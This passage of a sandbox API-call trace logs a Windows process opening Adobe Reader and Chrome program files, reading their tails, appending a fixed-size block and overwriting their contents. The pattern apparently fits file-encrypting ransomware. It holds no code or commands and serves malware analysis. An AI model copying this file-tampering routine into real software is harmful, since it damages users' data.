lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x242b [0101.411] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.412] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x242b [0101.412] WriteFile (in: hFile=0x204, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.413] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0101.413] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.413] CloseHandle (hObject=0x204) returned 1 [0101.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\thai.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0101.415] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0101.415] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3bc5 [0101.415] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0101.415] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0101.415] ReleaseMutex (hMutex=0x168) returned 1 [0101.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THAI.TXT", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0101.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THAI.TXT", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="THAI.TXT", lpUsedDefaultChar=0x0) returned 8 [0101.416] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.417] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2bc5 [0101.417] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.418] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2bc5 [0101.419] WriteFile (in: hFile=0x204, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.419] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0101.419] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.420] CloseHandle (hObject=0x204) returned 1 [0101.420] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1255.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0101.422] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0101.422] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x219a [0101.423] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0101.423] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0101.423] ReleaseMutex (hMutex=0x168) returned 1 [0101.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1255.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1255.TXT", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP1255.TXT", lpUsedDefaultChar=0x0) returned 10 [0101.423] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.425] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x119a [0101.425] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.426] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x119a [0101.426] WriteFile (in: hFile=0x204, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.426] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0101.426] WriteFile (in: hFile=0x204, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.426] CloseHandle (hObject=0x204) returned 1 [0101.427] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp950.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0101.428] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0101.428] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7fa1b [0101.428] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0101.428] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0101.428] ReleaseMutex (hMutex=0x168) returned 1 [0101.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP950.TXT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP950.TXT", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP950.TXT", lpUsedDefaultChar=0x0) returned 9 [0101.429] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0101.431] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7ea1b [0101.431] ReadFile (in: hFile=0x204, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.433] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7ea1b [0101.433] WriteFile (in: hFile=0x204, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.434] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0101.434] WriteFile (in: hFile=0x204, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0101.434] CloseHandle (hObject=0x204) returned 1 [0101.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1035.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1035.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.437] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1035.mst", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1035.mst", lpFilePart=0x345f690*="1035.mst") returned 0x64 [0101.437] GetLastError () returned 0x5 [0101.438] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0101.438] LocalFree (hMem=0x69e2b0) returned 0x0 [0101.438] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0101.438] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0101.438] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0101.439] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0101.439] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1035.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1035.mst")) returned 0x21 [0101.440] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1045.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1045.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.441] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1045.mst", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1045.mst", lpFilePart=0x345f690*="1045.mst") returned 0x64 [0101.441] GetLastError () returned 0x5 [0101.441] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0101.441] LocalFree (hMem=0x69e2b0) returned 0x0 [0101.441] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0101.442] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0101.442] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0101.442] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0101.442] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1045.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1045.mst")) returned 0x21 [0101.443] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1058.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1058.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0112.441] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1058.mst", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1058.mst", lpFilePart=0x345f690*="1058.mst") returned 0x64 [0112.442] GetLastError () returned 0x5 [0112.442] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0112.443] LocalFree (hMem=0x69e2b0) returned 0x0 [0112.443] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0112.444] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0112.445] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0112.446] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0112.446] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1058.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1058.mst")) returned 0x21 [0112.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0112.448] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini", lpFilePart=0x345f690*="setup.ini") returned 0x65 [0112.448] GetLastError () returned 0x5 [0112.448] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0112.448] LocalFree (hMem=0x69e2b0) returned 0x0 [0112.448] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0112.448] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0112.448] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0112.448] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0112.448] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\setup.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\setup.ini")) returned 0x21 [0112.449] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_100_percent.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0112.451] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0112.452] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6f44c [0112.452] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0112.452] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0112.452] ReleaseMutex (hMutex=0x168) returned 1 [0112.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome_100_percent.pak", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0112.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome_100_percent.pak", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrome_100_percent.pak", lpUsedDefaultChar=0x0) returned 22 [0112.453] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0112.456] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6e44c [0112.456] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0112.459] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6e44c [0112.460] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0112.462] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0112.462] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0112.462] CloseHandle (hObject=0x1d8) returned 1 [0112.463] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\external_extensions.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0112.466] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0112.466] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x63 [0112.466] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0112.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0112.466] ReleaseMutex (hMutex=0x168) returned 1 [0112.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="external_extensions.json", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="external_extensions.json", cchWideChar=24, lpMultiByteStr=0x1f8fd5c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="external_extensions.json", lpUsedDefaultChar=0x0) returned 24 [0112.466] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f56d98, nNumberOfBytesToRead=0x63, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56d98*, lpNumberOfBytesRead=0x345f2bc*=0x63, lpOverlapped=0x0) returned 1 [0112.467] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0112.467] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5eb, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x5eb, lpOverlapped=0x0) returned 1 [0112.469] CloseHandle (hObject=0x1d8) returned 1 [0112.469] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ca.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0112.473] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0112.473] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x5082b [0112.473] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0112.473] 